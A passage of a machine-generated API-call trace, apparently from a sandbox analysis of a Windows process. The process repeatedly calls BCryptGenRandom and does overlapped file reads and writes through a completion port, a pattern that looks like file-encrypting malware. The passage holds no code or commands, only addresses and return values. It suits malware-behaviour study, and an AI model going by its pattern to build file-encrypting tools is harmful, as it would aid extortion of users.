(_Block=0x77d7a8) [0117.957] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.957] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.957] free (_Block=0x2071c20) [0117.957] free (_Block=0x2071d30) [0117.957] free (_Block=0x77d8b0) [0117.957] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.970] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2994, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0117.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.981] ReadFile (in: hFile=0x81c, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x844, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.984] CloseHandle (hObject=0x340) returned 1 [0117.986] free (_Block=0x1ff1e60) [0117.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0117.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0117.998] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.998] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0117.998] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.998] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.999] free (_Block=0x77d7a8) [0117.999] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.999] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.999] free (_Block=0x2071c20) [0117.999] free (_Block=0x2071d30) [0117.999] free (_Block=0x77d8b0) [0117.999] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.000] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.021] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2ce2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.022] CloseHandle (hObject=0x340) returned 1 [0118.023] free (_Block=0x3d70450) [0118.027] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.046] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.046] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.046] free (_Block=0x77d7a8) [0118.046] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.046] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.046] free (_Block=0x2071c20) [0118.046] free (_Block=0x2071d30) [0118.046] free (_Block=0x77d8b0) [0118.046] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.049] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.051] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.051] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.051] free (_Block=0x77d7a8) [0118.051] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.051] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.052] free (_Block=0x2071c20) [0118.052] free (_Block=0x2071d30) [0118.052] free (_Block=0x77d8b0) [0118.052] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.053] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.064] CloseHandle (hObject=0x2f4) returned 1 [0118.066] free (_Block=0x3e70008) [0118.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.078] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.078] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.078] free (_Block=0x77d7a8) [0118.078] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.078] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.079] free (_Block=0x2071c20) [0118.079] free (_Block=0x2071d30) [0118.079] free (_Block=0x77d8b0) [0118.079] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.091] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.091] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.091] free (_Block=0x77d7a8) [0118.091] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.091] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.092] free (_Block=0x2071c20) [0118.092] free (_Block=0x2071d30) [0118.092] free (_Block=0x77d8b0) [0118.092] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.092] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.101] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.101] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.101] free (_Block=0x77d7a8) [0118.101] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.102] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.102] free (_Block=0x2071c20) [0118.102] free (_Block=0x2071d30) [0118.102] free (_Block=0x77d8b0) [0118.102] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.126] CloseHandle (hObject=0x2f4) returned 1 [0118.131] free (_Block=0x1ff1e60) [0118.131] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.142] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.257] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x47c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.265] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.266] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.266] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.266] free (_Block=0x77d7a8) [0118.266] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.266] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.267] free (_Block=0x2071c20) [0118.267] free (_Block=0x2071d30) [0118.267] free (_Block=0x77d8b0) [0118.267] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.268] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.302] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1cac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.315] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3dbe, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.342] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1746, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.371] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.385] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.385] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.385] free (_Block=0x77d7a8) [0118.385] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.385] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.385] free (_Block=0x2071c20) [0118.385] free (_Block=0x2071d30) [0118.385] free (_Block=0x77d8b0) [0118.385] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.396] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.396] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.397] free (_Block=0x77d7a8) [0118.397] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.397] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.397] free (_Block=0x2071c20) [0118.397] free (_Block=0x2071d30) [0118.397] free (_Block=0x77d8b0) [0118.397] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0118.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0118.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0118.409] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.420] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.420] free (_Block=0x77d7a8) [0118.420] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.420] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.421] free (_Block=0x2071c20) [0118.421] free (_Block=0x2071d30) [0118.421] free (_Block=0x77d8b0) [0118.421] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0118.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.583] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0141.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.589] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0141.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.599] CloseHandle (hObject=0x170) returned 1 [0141.599] free (_Block=0x3df0008) [0141.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.610] ReadFile (in: hFile=0x3cc, 